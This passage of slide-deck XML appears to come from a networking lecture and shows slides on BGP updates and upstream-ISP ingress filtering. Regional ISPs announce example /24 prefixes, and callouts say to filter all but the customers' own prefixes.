          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BGP update:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>56.56.0.0/24,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11292" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6577013" y="6551613"/>
            <a:ext cx="387350" cy="15875"/>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11293" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3794125" y="3141663"/>
            <a:ext cx="1312863" cy="839787"/>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regional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11294" name="Text Box 89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3519488" y="7032625"/>
            <a:ext cx="1311275" cy="838200"/>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regional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ISP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11295" name="Text Box 90"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8688388" y="5446713"/>
            <a:ext cx="1485900"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tier-1 ISP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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{09F1EE9D-D7E8-4172-B22D-EC3C3DD1DE27}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="914400"/>
            <a:ext cx="11491913" cy="11430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Ingress Filtering: Upstream ISP (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Freeform 3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3683000" y="2590800"/>
            <a:ext cx="2909888" cy="291465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2293" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3421063" y="6264275"/>
            <a:ext cx="2909887" cy="291465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2294" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7431088" y="2928938"/>
            <a:ext cx="4175125" cy="641032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2295" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1495425" y="2243138"/>
            <a:ext cx="1519238" cy="131921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2296" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1495425" y="3884613"/>
            <a:ext cx="1400175" cy="131921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2297" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1495425" y="5754688"/>
            <a:ext cx="1493838" cy="131762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2298" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1571625" y="7510463"/>
            <a:ext cx="1506538" cy="131921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2299" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2981325" y="2928938"/>
            <a:ext cx="738188" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2841625" y="4159250"/>
            <a:ext cx="895350" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2962275" y="6445250"/>
            <a:ext cx="511175" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3032125" y="7937500"/>
            <a:ext cx="474663" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12303" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6127750" y="7496175"/>
            <a:ext cx="2492375" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12304" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1271272" y="2463800"/>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a:t>12.12.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268891" y="4105275"/>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a:t>34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1391128" y="5932488"/>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a:t>56.56.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12307" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1341122" y="7867650"/>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a:t>78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12308" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5764213" y="4110038"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12364" name="Group 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12366" name="Oval 21"/>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2367" name="Line 22"/>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2368" name="Line 23"/>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2369" name="Rectangle 24"/>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2370" name="Oval 25"/>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2371" name="Group 26"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12376" name="Line 2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2377" name="Line 2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2378" name="Line 2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2372" name="Group 30"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12373" name="Line 3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2374" name="Line 3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2375" name="Line 3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2365" name="Line 34"/>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2309" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7688263" y="4135438"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12349" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12351" name="Oval 37"/>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2352" name="Line 38"/>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2353" name="Line 39"/>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2354" name="Rectangle 40"/>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2355" name="Oval 41"/>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2356" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12361" name="Line 4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2362" name="Line 4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2363" name="Line 4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2357" name="Group 46"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12358" name="Line 4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2359" name="Line 4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2360" name="Line 4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2350" name="Line 50"/>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2310" name="Group 51"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5595938" y="7404100"/>
            <a:ext cx="563562" cy="230188"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12334" name="Group 52"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12336" name="Oval 53"/>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2337" name="Line 54"/>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2338" name="Line 55"/>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2339" name="Rectangle 56"/>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2340" name="Oval 57"/>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2341" name="Group 58"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12346" name="Line 5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2347" name="Line 6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2348" name="Line 6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2342" name="Group 62"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12343" name="Line 6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2344" name="Line 6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2345" name="Line 6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2335" name="Line 66"/>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2311" name="Group 67"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8582025" y="7402513"/>
            <a:ext cx="565150" cy="230187"/>
            <a:chOff x="533" y="321"/>
            <a:chExt cx="359" cy="180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12319" name="Group 68"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="533" y="321"/>
              <a:ext cx="359" cy="180"/>
              <a:chOff x="1009" y="655"/>
              <a:chExt cx="359" cy="180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12321" name="Oval 69"/>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2322" name="Line 70"/>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2323" name="Line 71"/>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2324" name="Rectangle 72"/>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2325" name="Oval 73"/>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2326" name="Group 74"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1095" y="681"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12331" name="Line 7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2332" name="Line 7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2333" name="Line 7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2327" name="Group 78"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1095" y="680"/>
                <a:ext cx="176" cy="68"/>
                <a:chOff x="2848" y="848"/>
                <a:chExt cx="140" cy="98"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12328" name="Line 7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2329" name="Line 8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2330" name="Line 8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2320" name="Line 82"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12312" name="Line 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6353175" y="4211638"/>
            <a:ext cx="1373188" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12313" name="Text Box 84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5266104" y="2767013"/>
            <a:ext cx="1756632" cy="1054646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>BGP update:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>12.12.0.0/24,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12314" name="Line 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7004050" y="3300413"/>
            <a:ext cx="388938" cy="15875"/>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12315" name="Text Box 86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5005754" y="6129338"/>
            <a:ext cx="1756632" cy="1054646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>BGP update:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>56.56.0.0/24,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>78.78.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12316" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6729413" y="6627813"/>
            <a:ext cx="387350" cy="15875"/>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12317" name="AutoShape 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8078788" y="2562225"/>
            <a:ext cx="2309812" cy="1233488"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46111"/>
              <a:gd name="adj2" fmla="val 64079"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter all but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>12.12.0.0/24 and 34.34.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12318" name="AutoShape 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8821738" y="5835650"/>
            <a:ext cx="2328862" cy="1235075"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46111"/>
              <a:gd name="adj2" fmla="val 64079"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Filter all but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>56.56.0.0/24 and 78.78.0.0/24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0"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C36EBA2-A58E-4889-B9E0-4CF38FFE4CD1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
